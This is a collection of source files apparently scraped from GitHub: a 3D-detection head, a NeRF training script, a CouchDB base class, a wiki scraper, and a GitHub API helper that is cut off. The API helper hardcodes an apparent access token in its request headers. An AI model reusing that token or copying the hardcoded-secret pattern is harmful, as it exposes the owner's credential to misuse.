`https://github.com/open-mmlab/mmdetection3d/blob/master/mmdet3d/models/dense_heads/centerpoint_head.py`\"\"\" # noqa\nimport torch\nfrom mmdet3d.core import draw_heatmap_gaussian, gaussian_radius\nfrom mmdet3d.models.dense_heads.centerpoint_head import CenterHead\nfrom mmdet3d.models.utils import clip_sigmoid\nfrom mmdet.core import reduce_mean\nfrom mmdet.models import build_backbone\nfrom mmdet3d.models import build_neck\nfrom torch.cuda.amp import autocast\n\n__all__ = ['BEVHeightHead']\n\nbev_backbone_conf = dict(\n type='ResNet',\n in_channels=80,\n depth=18,\n num_stages=3,\n strides=(1, 2, 2),\n dilations=(1, 1, 1),\n out_indices=[0, 1, 2],\n norm_eval=False,\n base_channels=160,\n)\n\nbev_neck_conf = dict(type='SECONDFPN',\n in_channels=[160, 320, 640],\n upsample_strides=[2, 4, 8],\n out_channels=[64, 64, 128])\n\n\nclass BEVHeightHead(CenterHead):\n \"\"\"Head for BevDepth.\n\n Args:\n in_channels(int): Number of channels after bev_neck.\n tasks(dict): Tasks for head.\n bbox_coder(dict): Config of bbox coder.\n common_heads(dict): Config of head for each task.\n loss_cls(dict): Config of classification loss.\n loss_bbox(dict): Config of regression loss.\n gaussian_overlap(float): Gaussian overlap used for `get_targets`.\n min_radius(int): Min radius used for `get_targets`.\n train_cfg(dict): Config used in the training process.\n test_cfg(dict): Config used in the test process.\n bev_backbone_conf(dict): Cnfig of bev_backbone.\n bev_neck_conf(dict): Cnfig of bev_neck.\n \"\"\"\n def __init__(\n self,\n in_channels=256,\n tasks=None,\n bbox_coder=None,\n common_heads=dict(),\n loss_cls=dict(type='GaussianFocalLoss', reduction='mean'),\n loss_bbox=dict(type='L1Loss', reduction='mean', loss_weight=0.25),\n gaussian_overlap=0.1,\n min_radius=2,\n train_cfg=None,\n test_cfg=None,\n bev_backbone_conf=bev_backbone_conf,\n bev_neck_conf=bev_neck_conf,\n separate_head=dict(type='SeparateHead',\n init_bias=-2.19,\n final_kernel=3),\n ):\n super(BEVHeightHead, self).__init__(\n in_channels=in_channels,\n tasks=tasks,\n bbox_coder=bbox_coder,\n common_heads=common_heads,\n loss_cls=loss_cls,\n loss_bbox=loss_bbox,\n separate_head=separate_head,\n )\n self.trunk = build_backbone(bev_backbone_conf)\n self.trunk.init_weights()\n self.neck = build_neck(bev_neck_conf)\n self.neck.init_weights()\n del self.trunk.maxpool\n self.gaussian_overlap = gaussian_overlap\n self.min_radius = min_radius\n self.train_cfg = train_cfg\n self.test_cfg = test_cfg\n\n @autocast(False)\n def forward(self, x):\n \"\"\"Forward pass.\n\n Args:\n feats (list[torch.Tensor]): Multi-level features, e.g.,\n features produced by FPN.\n\n Returns:\n tuple(list[dict]): Output results for tasks.\n \"\"\"\n # FPN\n trunk_outs = [x]\n if self.trunk.deep_stem:\n x = self.trunk.stem(x)\n else:\n x = self.trunk.conv1(x)\n x = self.trunk.norm1(x)\n x = self.trunk.relu(x)\n for i, layer_name in enumerate(self.trunk.res_layers):\n res_layer = getattr(self.trunk, layer_name)\n x = res_layer(x)\n if i in self.trunk.out_indices:\n trunk_outs.append(x)\n fpn_output = self.neck(trunk_outs)\n ret_values = super().forward(fpn_output)\n return ret_values\n\n def get_targets_single(self, gt_bboxes_3d, gt_labels_3d):\n \"\"\"Generate training targets for a single sample.\n\n Args:\n gt_bboxes_3d (:obj:`LiDARInstance3DBoxes`): Ground truth gt boxes.\n gt_labels_3d (torch.Tensor): Labels of boxes.\n\n Returns:\n tuple[list[torch.Tensor]]: Tuple of target including \\\n the following results in order.\n\n - list[torch.Tensor]: Heatmap scores.\n - list[torch.Tensor]: Ground truth boxes.\n - list[torch.Tensor]: Indexes indicating the position \\\n of the valid boxes.\n - list[torch.Tensor]: Masks indicating which boxes \\\n are valid.\n \"\"\"\n max_objs = self.train_cfg['max_objs'] * self.train_cfg['dense_reg']\n grid_size = torch.tensor(self.train_cfg['grid_size'])\n pc_range = torch.tensor(self.train_cfg['point_cloud_range'])\n voxel_size = torch.tensor(self.train_cfg['voxel_size'])\n\n feature_map_size = grid_size[:2] // self.train_cfg['out_size_factor']\n # reorganize the gt_dict by tasks\n task_masks = []\n flag = 0\n for class_name in self.class_names:\n task_masks.append([\n torch.where(gt_labels_3d == class_name.index(i) + flag)\n for i in class_name\n ])\n flag += len(class_name)\n\n task_boxes = []\n task_classes = []\n flag2 = 0\n for idx, mask in enumerate(task_masks):\n task_box = []\n task_class = []\n for m in mask:\n task_box.append(gt_bboxes_3d[m])\n # 0 is background for each task, so we need to add 1 here.\n task_class.append(gt_labels_3d[m] + 1 - flag2)\n task_boxes.append(\n torch.cat(task_box, axis=0).to(gt_bboxes_3d.device))\n task_classes.append(\n torch.cat(task_class).long().to(gt_bboxes_3d.device))\n flag2 += len(mask)\n draw_gaussian = draw_heatmap_gaussian\n heatmaps, anno_boxes, inds, masks = [], [], [], []\n\n for idx, task_head in enumerate(self.task_heads):\n heatmap = gt_bboxes_3d.new_zeros(\n (len(self.class_names[idx]), feature_map_size[1],\n feature_map_size[0]),\n device='cuda')\n\n anno_box = gt_bboxes_3d.new_zeros((max_objs, 10),\n dtype=torch.float32,\n device='cuda')\n\n ind = gt_labels_3d.new_zeros((max_objs),\n dtype=torch.int64,\n device='cuda')\n mask = gt_bboxes_3d.new_zeros((max_objs),\n dtype=torch.uint8,\n device='cuda')\n\n num_objs = min(task_boxes[idx].shape[0], max_objs)\n\n for k in range(num_objs):\n cls_id = task_classes[idx][k] - 1\n\n width = task_boxes[idx][k][3]\n length = task_boxes[idx][k][4]\n width = width / voxel_size[0] / self.train_cfg[\n 'out_size_factor']\n length = length / voxel_size[1] / self.train_cfg[\n 'out_size_factor']\n\n if width > 0 and length > 0:\n radius = gaussian_radius(\n (length, width),\n min_overlap=self.train_cfg['gaussian_overlap'])\n radius = max(self.train_cfg['min_radius'], int(radius))\n\n # be really careful for the coordinate system of\n # your box annotation.\n x, y, z = task_boxes[idx][k][0], task_boxes[idx][k][\n 1], task_boxes[idx][k][2]\n\n coor_x = (\n x - pc_range[0]\n ) / voxel_size[0] / self.train_cfg['out_size_factor']\n coor_y = (\n y - pc_range[1]\n ) / voxel_size[1] / self.train_cfg['out_size_factor']\n\n center = torch.tensor([coor_x, coor_y],\n dtype=torch.float32,\n device='cuda')\n center_int = center.to(torch.int32)\n\n # throw out not in range objects to avoid out of array\n # area when creating the heatmap\n if not (0 <= center_int[0] < feature_map_size[0]\n and 0 <= center_int[1] < feature_map_size[1]):\n continue\n\n draw_gaussian(heatmap[cls_id], center_int, radius)\n\n new_idx = k\n x, y = center_int[0], center_int[1]\n\n assert y * feature_map_size[0] + x < feature_map_size[\n 0] * feature_map_size[1]\n\n ind[new_idx] = y * feature_map_size[0] + x\n mask[new_idx] = 1\n # TODO: support other outdoor dataset\n vx, vy = task_boxes[idx][k][7:]\n rot = task_boxes[idx][k][6]\n box_dim = task_boxes[idx][k][3:6]\n if self.norm_bbox:\n box_dim = box_dim.log()\n anno_box[new_idx] = torch.cat([\n center - torch.tensor([x, y], device='cuda'),\n z.unsqueeze(0),\n box_dim,\n torch.sin(rot).unsqueeze(0),\n torch.cos(rot).unsqueeze(0),\n vx.unsqueeze(0),\n vy.unsqueeze(0),\n ])\n\n heatmaps.append(heatmap)\n anno_boxes.append(anno_box)\n masks.append(mask)\n inds.append(ind)\n return heatmaps, anno_boxes, inds, masks\n\n def loss(self, targets, preds_dicts, **kwargs):\n \"\"\"Loss function for BEVHeightHead.\n\n Args:\n gt_bboxes_3d (list[:obj:`LiDARInstance3DBoxes`]): Ground\n truth gt boxes.\n gt_labels_3d (list[torch.Tensor]): Labels of boxes.\n preds_dicts (dict): Output of forward function.\n\n Returns:\n dict[str:torch.Tensor]: Loss of heatmap and bbox of each task.\n \"\"\"\n heatmaps, anno_boxes, inds, masks = targets\n return_loss = 0\n for task_id, preds_dict in enumerate(preds_dicts):\n # heatmap focal loss\n preds_dict[0]['heatmap'] = clip_sigmoid(preds_dict[0]['heatmap'])\n num_pos = heatmaps[task_id].eq(1).float().sum().item()\n cls_avg_factor = torch.clamp(reduce_mean(\n heatmaps[task_id].new_tensor(num_pos)),\n min=1).item()\n loss_heatmap = self.loss_cls(preds_dict[0]['heatmap'],\n heatmaps[task_id],\n avg_factor=cls_avg_factor)\n target_box = anno_boxes[task_id]\n # reconstruct the anno_box from multiple reg heads\n preds_dict[0]['anno_box'] = torch.cat(\n (\n preds_dict[0]['reg'],\n preds_dict[0]['height'],\n preds_dict[0]['dim'],\n preds_dict[0]['rot'],\n preds_dict[0]['vel'],\n ),\n dim=1,\n )\n\n # Regression loss for dimension, offset, height, rotation\n num = masks[task_id].float().sum()\n ind = inds[task_id]\n pred = preds_dict[0]['anno_box'].permute(0, 2, 3, 1).contiguous()\n pred = pred.view(pred.size(0), -1, pred.size(3))\n pred = self._gather_feat(pred, ind)\n mask = masks[task_id].unsqueeze(2).expand_as(target_box).float()\n num = torch.clamp(reduce_mean(target_box.new_tensor(num)),\n min=1e-4).item()\n isnotnan = (~torch.isnan(target_box)).float()\n mask *= isnotnan\n code_weights = self.train_cfg['code_weights']\n bbox_weights = mask * mask.new_tensor(code_weights)\n loss_bbox = self.loss_bbox(pred,\n target_box,\n bbox_weights,\n avg_factor=num)\n return_loss += loss_bbox\n return_loss += loss_heatmap\n return return_loss\n", "repo_name": "ADLab-AutoDrive/BEVHeight", "sub_path": "layers/heads/bev_height_head.py", "file_name": "bev_height_head.py", "file_ext": "py", "file_size_in_byte": 12368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 143, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mmdet3d.models.dense_heads.centerpoint_head.CenterHead", "line_number": 31, "usage_type": "name"}, {"api_name": "mmdet.models.build_backbone", "line_number": 75, "usage_type": "call"}, {"api_name": "mmdet3d.models.build_neck", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.cuda.amp.autocast", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 160, "usage_type": "call"}, {"api_name": "mmdet3d.core.draw_heatmap_gaussian", "line_number": 162, "usage_type": "name"}, {"api_name": "torch.float32", "line_number": 172, "usage_type": "attribute"}, {"api_name": "torch.int64", "line_number": 176, "usage_type": "attribute"}, {"api_name": "torch.uint8", "line_number": 179, "usage_type": "attribute"}, {"api_name": "mmdet3d.core.gaussian_radius", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 213, "usage_type": "attribute"}, {"api_name": "torch.int32", "line_number": 215, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 240, "usage_type": "call"}, {"api_name": "torch.sin", "line_number": 243, "usage_type": "call"}, {"api_name": "torch.cos", "line_number": 244, "usage_type": "call"}, {"api_name": "mmdet3d.models.utils.clip_sigmoid", "line_number": 271, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 273, "usage_type": "call"}, {"api_name": "mmdet.core.reduce_mean", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 299, "usage_type": "call"}, {"api_name": "mmdet.core.reduce_mean", "line_number": 299, "usage_type": "call"}, {"api_name": "torch.isnan", "line_number": 301, "usage_type": "call"}]} +{"seq_id": "70067151845", "text": "from load_llff import load_llff_data\nfrom embedding import get_embedder\nfrom model import NeRF\n\ndef batchify(fn, chunk):\n if chunk is None:\n return fn\n def ret(inputs):\n return torch.cat([fn(inputs[i:i+chunk]) for i in range(0, inputs.shape[0], chunk)], 0)\n return ret\n\n\ndef run_network(inputs, viewdirs, fn, embed_fn, embeddirs_fn, netchunk=1024*64):\n inputs_flat = torch.reshape(inputs, [-1, inputs.shape[-1]])\n\n embedded = embed_fn(inputs_flat)\n if viewdirs is not None:\n input_dirs = viewdirs[:, None].expand(inputs.shape)\n input_dirs_flat = torch.reshape(input_dirs, [-1, inputs.shape[-1]])\n embedded_dirs = embed_fn(input_dirs_flat)\n embedded = torch.cat([embedded, embedded_dirs], -1)\n \n outputs_flat = batchify(fn, netchunk)(embedded)\n outputs = torch.reshape(outputs_flat, list(input.shape[:-1]) + [outputs_flat.shape[-1]])\n\n return outputs\n\n\ndef create_nerf(args):\n embef_fn, input_ch = get_embedder(args.multires, args.i_embed) # positional encoding\n\n input_ch_views = 0\n embeddirs_fn = None\n # viewdirs\n if args.use_viewdirs:\n embeddirs_fn, input_ch_views = get_embedder(args.multires_views, args.i_embed)\n output_ch = 5 if args.N_importance > 0 else 4\n skips = [4] ### ????\n model = NeRF(D=args.netdepth, W=args.netwidth, input_ch=input_ch, output_ch=output_ch, skips=skips,\n input_ch_views=input_ch_views, use_viewdirs=args.use_viewdirs).to(device) \n grad_vars = list(model.parameters())\n\n model_fine = None\n if args.N_importance > 0:\n model_fine = NeRF(D=args.netdepth, W=args.netwidth, input_ch=input_ch, output_ch=output_ch, skips=skips,\n input_ch_views=input_ch_views, use_viewdirs=args.use_viewdirs).to(device) \n grad_vars += list(model_fine.parameters())\n\n def network_query_fn(inputs, viewdirs, network_fn): return run_network(\n inputs, viewdirs, network_fn,\n embed_fn=embed_fn,\n embeddirs_fn=embeddirs_fn,\n netchunk=args.netchunk\n )\n\n optimizer = torch.optim.Adam(params=grad_vars, lr=args.lrate, betas=(0.9, 0.999))\n\n start = 0\n basedir = args.basedir\n expname = args.expname\n ############################\n\n if args.ft_path is not None and args.ft_path != 'None':\n ckpts = [args.ft_path]\n else:\n ckpts = [os.path.join(basedir, expname, f) for f in sorted(os.listdir(os.path.join(basedir, expname))) if 'tar' in f]\n \n print('Found ckpts', ckpts)\n if len(ckpts) > 0 and not args.no_reload:\n ckpt_path = ckpts[-1]\n print('Reloading from', ckpt_path)\n ckpt = torch.load(ckpt_path)\n\n start = ckpt['global_step']\n optimizer.load_state_dict(ckpt['optimizer_state_dict'])\n\n # load model\n model.load_state_dict(ckpt['network_fn_state_dict'])\n if model_fine is not None:\n model_fine.load_state_dict(ckpt['network_fine_state_dict'])\n #########################\n render_kwargs_train = {\n 'network_query_fn' : network_query_fn,\n 'perturb' : args.perturb,\n 'N_importance' : args.N_importance,\n 'network_fine' : model_fine,\n 'N_samples' : args.N_samples,\n 'network_fn' : model,\n 'use_viewdirs' : args.use_viewdirs,\n 'white_bkgd' : args.white_bkgd,\n 'raw_noise_std' : args.raw_noise_std,\n }\n\n # NDC only good for LLFF-style forward facing data !\n\n render_kwargs_test = {\n k : render_kwargs_train[k] for k in render_kwargs_train\n }\n render_kwargs_test['perturb'] = False\n render_kwargs_test['raw_noise_std'] = 0.\n\n return render_kwargs_train, render_kwargs_test, start, grad_vars, optimizer\n\ndef config_parser():\n import configargparse\n parser = configargparse.ArgumentParser()\n parser.add_argument('--config', is_config_file=True, \n help='config file path')\n parser.add_argument(\"--expname\", type=str, \n help='experiment name')\n parser.add_argument(\"--basedir\", type=str, default='./logs/', \n help='where to store ckpts and logs')\n parser.add_argument(\"--datadir\", type=str, default='./data/llff/fern', \n help='input data directory')\n\n # training options\n parser.add_argument(\"--netdepth\", type=int, default=8, \n help='layers in network')\n parser.add_argument(\"--netwidth\", type=int, default=256, \n help='channels per layer')\n parser.add_argument(\"--netdepth_fine\", type=int, default=8, \n help='layers in fine network')\n parser.add_argument(\"--netwidth_fine\", type=int, default=256, \n help='channels per layer in fine network')\n parser.add_argument(\"--N_rand\", type=int, default=32*32*4, \n help='batch size (number of random rays per gradient step)')\n parser.add_argument(\"--lrate\", type=float, default=5e-4, \n help='learning rate')\n parser.add_argument(\"--lrate_decay\", type=int, default=250, \n help='exponential learning rate decay (in 1000 steps)')\n parser.add_argument(\"--chunk\", type=int, default=1024*32, \n help='number of rays processed in parallel, decrease if running out of memory')\n parser.add_argument(\"--netchunk\", type=int, default=1024*64, \n help='number of pts sent through network in parallel, decrease if running out of memory')\n parser.add_argument(\"--no_batching\", action='store_true', \n help='only take random rays from 1 image at a time')\n parser.add_argument(\"--no_reload\", action='store_true', \n help='do not reload weights from saved ckpt')\n parser.add_argument(\"--ft_path\", type=str, default=None, \n help='specific weights npy file to reload for coarse network')\n\n # rendering options\n parser.add_argument(\"--N_samples\", type=int, default=64, \n help='number of coarse samples per ray')\n parser.add_argument(\"--N_importance\", type=int, default=0,\n help='number of additional fine samples per ray')\n parser.add_argument(\"--perturb\", type=float, default=1.,\n help='set to 0. for no jitter, 1. for jitter')\n parser.add_argument(\"--use_viewdirs\", action='store_true', \n help='use full 5D input instead of 3D')\n parser.add_argument(\"--i_embed\", type=int, default=0, \n help='set 0 for default positional encoding, -1 for none')\n parser.add_argument(\"--multires\", type=int, default=10, \n help='log2 of max freq for positional encoding (3D location)')\n parser.add_argument(\"--multires_views\", type=int, default=4, \n help='log2 of max freq for positional encoding (2D direction)')\n parser.add_argument(\"--raw_noise_std\", type=float, default=0., \n help='std dev of noise added to regularize sigma_a output, 1e0 recommended')\n\n parser.add_argument(\"--render_only\", action='store_true', \n help='do not optimize, reload weights and render out render_poses path')\n parser.add_argument(\"--render_test\", action='store_true', \n help='render the test set instead of render_poses path')\n parser.add_argument(\"--render_factor\", type=int, default=0, \n help='downsampling factor to speed up rendering, set 4 or 8 for fast preview')\n\n # training options\n parser.add_argument(\"--precrop_iters\", type=int, default=0,\n help='number of steps to train on central crops')\n parser.add_argument(\"--precrop_frac\", type=float,\n default=.5, help='fraction of img taken for central crops') \n\n # dataset options\n parser.add_argument(\"--dataset_type\", type=str, default='llff', \n help='options: llff / blender / deepvoxels')\n parser.add_argument(\"--testskip\", type=int, default=8, \n help='will load 1/N images from test/val sets, useful for large datasets like deepvoxels')\n\n ## deepvoxels flags\n parser.add_argument(\"--shape\", type=str, default='greek', \n help='options : armchair / cube / greek / vase')\n\n ## blender flags\n parser.add_argument(\"--white_bkgd\", action='store_true', \n help='set to render synthetic data on a white bkgd (always use for dvoxels)')\n parser.add_argument(\"--half_res\", action='store_true', \n help='load blender synthetic data at 400x400 instead of 800x800')\n\n ## llff flags\n parser.add_argument(\"--factor\", type=int, default=8, \n help='downsample factor for LLFF images')\n parser.add_argument(\"--no_ndc\", action='store_true', \n help='do not use normalized device coordinates (set for non-forward facing scenes)')\n parser.add_argument(\"--lindisp\", action='store_true', \n help='sampling linearly in disparity rather than depth')\n parser.add_argument(\"--spherify\", action='store_true', \n help='set for spherical 360 scenes')\n parser.add_argument(\"--llffhold\", type=int, default=8, \n help='will take every 1/N images as LLFF test set, paper uses 8')\n\n # logging/saving options\n parser.add_argument(\"--i_print\", type=int, default=100, \n help='frequency of console printout and metric loggin')\n parser.add_argument(\"--i_img\", type=int, default=500, \n help='frequency of tensorboard image logging')\n parser.add_argument(\"--i_weights\", type=int, default=10000, \n help='frequency of weight ckpt saving')\n parser.add_argument(\"--i_testset\", type=int, default=50000, \n help='frequency of testset saving')\n parser.add_argument(\"--i_video\", type=int, default=50000, \n help='frequency of render_poses video saving')\n\n return parser\n \ndef train():\n parser = config_parser()\n args = parser.parse_args()\n \n \"\"\"\n llff dataset 불러오기 + setting\n \"\"\"\n images, poses, bds, render_poses, i_test = load_llff_data(args.datadir, args.factor,\n recenter=True, bd_factor=.75,\n spherify=args.spherify)\n \n print(\"IMG\", images.shape)\n print(\"POSES\", poses.shape)\n print(\"bds\", bds.shape)\n print(\"render_poses\", render_poses.shape)\n print(\"i_test\", i_test.shape)\n \n hwf = poses[0, :3, -1] # height, width, focal length\n poses = poses[:,:3,:4] # camera extrinsic matrix\n \n if not isinstance(i_test, list):\n i_test = [i_test]\n \n if args.llffhold > 0:\n print('Auto LLFF holdout,', args.llffhold)\n i_test = np.arange(images.shape[0])[::args.llffhold]\n \n i_val = i_test\n i_train = np.array([i for i in np.arange(int(images.shape[0])) if\n (i not in i_test and i not in i_val)])\n \n print('Defining Bounds')\n near = 0.\n far = 1.\n print('NEAR FAR', near, far) # llff dataset에선 ndc(normalized device coordinates)를 사용하기 때문에 near -> 0 far -> 1로 설정\n \n \"\"\"\n instrinsics\n \"\"\"\n H, W, focal = hwf\n H, W = int(H), int(W)\n hwf = [H, W, focal]\n \n K = np.array([\n [focal, 0, 0.5*W],\n [0, focal, 0.5*H],\n [0, 0, 1]\n ])\n \n \"\"\"\n Create log dir / make config file\n \"\"\"\n basedir = args.basedir # ./logs/\n expname = \"default\" # args.expname\n os.makedirs(os.path.join(basedir, expname), exist_ok=True)\n f = os.path.join(basedir, expname, 'args.txt')\n with open(f, 'w') as file:\n for arg in sorted(vars(args)):\n attr = getattr(args, arg)\n file.write('{} = {}\\n'.format(arg, attr))\n if args.config is not None:\n f = os.path.join(basedir, expname, 'config.txt')\n with open(f, 'w') as file:\n file.write(open(args.config, 'r').read())\n \n \"\"\"\n Create NeRF model\n \"\"\"\n render_kwargs_train, render_kwargs_test, start, grad_vars, optimizer = create_nerf(args)\n global_step = start\n\n bds_dict = {\n 'near': near,\n 'far': far,\n } \n \n render_kwargs_train.update(bds_dict)\n render_kwargs_test.update(bds_dict)\n\n # Move testind data to GPU\n render_poses = torch.Tensor(render_poses).to(device)\n\n # rendering out from trained model\n if args.render_only:\n print(\"RENDER ONLY\")\n with torch.no_grad():\n if args.render_test:\n # render_test switches to test poses\n images = images[i_test]\n else:\n # Default is smoother render_poses path\n images = None\n \n\nif __name__=='__main__':\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n train()", "repo_name": "kim-minsol/paper", "sub_path": "NeRF/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 13089, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "embedding.get_embedder", "line_number": 30, "usage_type": "call"}, {"api_name": "embedding.get_embedder", "line_number": 36, "usage_type": "call"}, {"api_name": "model.NeRF", "line_number": 39, "usage_type": "call"}, {"api_name": "model.parameters", "line_number": 41, "usage_type": "call"}, {"api_name": "model.NeRF", "line_number": 45, "usage_type": "call"}, {"api_name": "model.load_state_dict", "line_number": 78, "usage_type": "call"}, {"api_name": "configargparse.ArgumentParser", "line_number": 106, "usage_type": "call"}, {"api_name": "load_llff.load_llff_data", "line_number": 222, "usage_type": "call"}]} +{"seq_id": "13809051640", "text": "from corduroy import Document\nfrom datetime import datetime\nfrom dateutil.parser import parse as date_parse\n\nclass BaseDocument(Document):\n def __init__(self, *args, **kwargs):\n default = self.__class__.defaults\n # print value\n type_keys = default.keys()\n value = args[0] if len(args) >= 1 else None\n\n if value is None or not isinstance(value, dict):\n value = {}\n val_keys = value.keys()\n for tkey in type_keys:\n if tkey in val_keys and value[tkey]:\n if isinstance(default[tkey], datetime):\n if not isinstance(value[tkey], datetime):\n dt = date_parse(value[tkey])\n value[tkey] = dt\n else:\n value[tkey] = type(default[tkey])(value[tkey])\n else:\n value[tkey] = default[tkey]\n super(BaseDocument, self).__init__(value)\n self.doc_type = self.__class__.__name__\n", "repo_name": "jagguli/stormbase", "sub_path": "stormbase/database/couchdb/document.py", "file_name": "document.py", "file_ext": "py", "file_size_in_byte": 985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "corduroy.Document", "line_number": 5, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 17, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 18, "usage_type": "argument"}, {"api_name": "dateutil.parser.parse", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "13981736195", "text": "# Imports\nimport pandas as pd\nimport time\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport matplotlib.pyplot as plt\n\n# Creating web driver object\ndriver = webdriver.Chrome()\npage_url = \"https://harrypotter.fandom.com/wiki/Category:Character_indexes\"\ndriver.get(page_url)\n\n# Extracting data from web pages\n# Books\nfrom selenium.webdriver.common.by import By\nbooks = driver.find_elements(By.CLASS_NAME, 'category-page__member-link')\n\ntime.sleep(3)\n# Creating a dictionary of books and URLs\nbooks_url_dict = []\nfor category in books:\n book_url = category.get_attribute('href')\n book_name = category.text.replace(' (character index)','')\n books_url_dict.append({'book_name':book_name, 'url':book_url})\n#print(books_url_dict)\n\n# Extract characters\nchar_list_1 = []\nchar_list_2 = []\nfor i in range(0,len(books_url_dict)):\n if i in (0,5): # Part 1\n # for book in books_url_dict:\n #book+=books_url_dict[i]\n # go to book page\n driver.get(books_url_dict[i]['url'])\n\n char_elems = driver.find_elements(By.CLASS_NAME, 'article-table')\n for elem in char_elems:\n char_list_1.append({'book':books_url_dict[i]['book_name'],'character':elem.text})\n #print(char_list_1[0])\n if i in (1,2,3,4,6): # Part 2\n book = books_url_dict[i]\n # go to book page\n driver.get(book['url'])\n char_elems = driver.find_elements(By.XPATH, '//*[@id=\"mw-content-text\"]/div/ul')\n for elem in char_elems[:-2]:\n char_list_2.append({'book':book['book_name'],'character':elem.text})\n #print(char_list_2[0])\n\n# Converting the scrapped data into a DataFrame and Preprocessing\n# Converting names to lists\nfor i in char_list_1:\n i['character'] = i['character'].split('\\n')\n\nfor i in char_list_2:\n i['character'] = i['character'].split('\\n')\n\n# Creating Dataframes\n# char_list_1\ndf_1 = pd.DataFrame(char_list_1[0])\nfor i in range(1,len(char_list_1)):\n new = pd.DataFrame(char_list_1[i])\n df_1 = df_1.append(new)\n \n# char_list_2\ndf_2 = pd.DataFrame(char_list_2[0])\nfor i in range(1,len(char_list_2)):\n new = pd.DataFrame(char_list_2[i])\n df_2 = df_2.append(new)\n \ndf = df_1.append(df_2)\ndf.reset_index(drop=True, inplace=True)\n\n# Visualizing character counts in each book\n\ndf['book'].value_counts().plot(kind='bar')\nplt.show()\n\n# Export data to a csv file\ndf.to_csv('characters.csv',index=False)", "repo_name": "sruthi004/Character-Analysis-of-Harry-Potter-books-using-Spacy", "sub_path": "src/components/web_scraping.py", "file_name": "web_scraping.py", "file_ext": "py", "file_size_in_byte": 2442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 9, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 9, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 16, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 16, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 18, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 37, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 37, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 45, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 45, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 60, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 62, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 66, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}]} +{"seq_id": "14027759400", "text": "import requests\nimport sys\nfrom static_variables import *\n\n\ndef get_data_collection_from_github_api(url):\n data = []\n while 1:\n response = get_response_from_github_api(url)\n json_response = response.json()\n data += json_response\n if LINK in response.headers:\n url = get_next_page_url(response.headers[LINK])\n else:\n url = None\n\n if url is None:\n break\n\n return data\n\n\ndef get_next_page_url(links):\n links = links.split(\", \")\n for link in links:\n ind = link.find('next')\n if ind != -1:\n return link[1:ind - 8]\n\n return None\n\n\ndef get_single_data_from_github_api(url):\n response = get_response_from_github_api(url)\n json_response = response.json()\n return json_response\n\n\ndef get_response_from_github_api(url):\n token = 'c1b10f829ce912233539e37dabc0e1fac7a516ca'\n headers = {'Authorization': 'token ' + token}\n\n response = requests.get(url, headers=headers)\n check_for_unexpected_response(response, url)\n\n return response\n\n\ndef check_for_unexpected_response(response, url):\n json_response = response.json()\n if MESSAGE in json_response:\n message = json_response[MESSAGE]\n if message.find(BAD_CREDENTIALS_MESSAGE) != -1:\n sys.exit(BAD_CREDENTIALS_MESSAGE)\n elif message.find(RATE_LIMIT_EXCEEDED_MESSAGE) != -1:\n sys.exit(RATE_LIMIT_EXCEEDED_MESSAGE)\n elif message.find(NOT_FOUND_MESSAGE) != -1:\n sys.exit(url + \" is \" + NOT_FOUND_MESSAGE)\n\n\ndef get_pr_reviewers(review_url):\n reviews_data = get_data_collection_from_github_api(review_url)\n unique_reviewers = set()\n for review in reviews_data:\n unique_reviewers.add(review[USER][LOGIN])\n reviewers = []\n for reviewer in unique_reviewers:\n user = {USER: reviewer}\n reviewers.append(user)\n return reviewers\n\n\ndef get_pr_commits(commits_url):\n commits_data = get_data_collection_from_github_api(commits_url)\n commits = []\n for commit_data in commits_data:\n commit = {SHA: commit_data[SHA], COMMITED_AT: commit_data[COMMIT][AUTHOR][DATE]}\n if commit_data[AUTHOR] is None:\n commit[AUTHOR] = commit_data[COMMIT][AUTHOR][NAME]\n else:\n commit[AUTHOR] = commit_data[AUTHOR][LOGIN]\n commits.append(commit)\n\n return commits\n\n\ndef get_pr_comments(pr_url):\n review_comments = get_review_comments(pr_url + \"/\" + 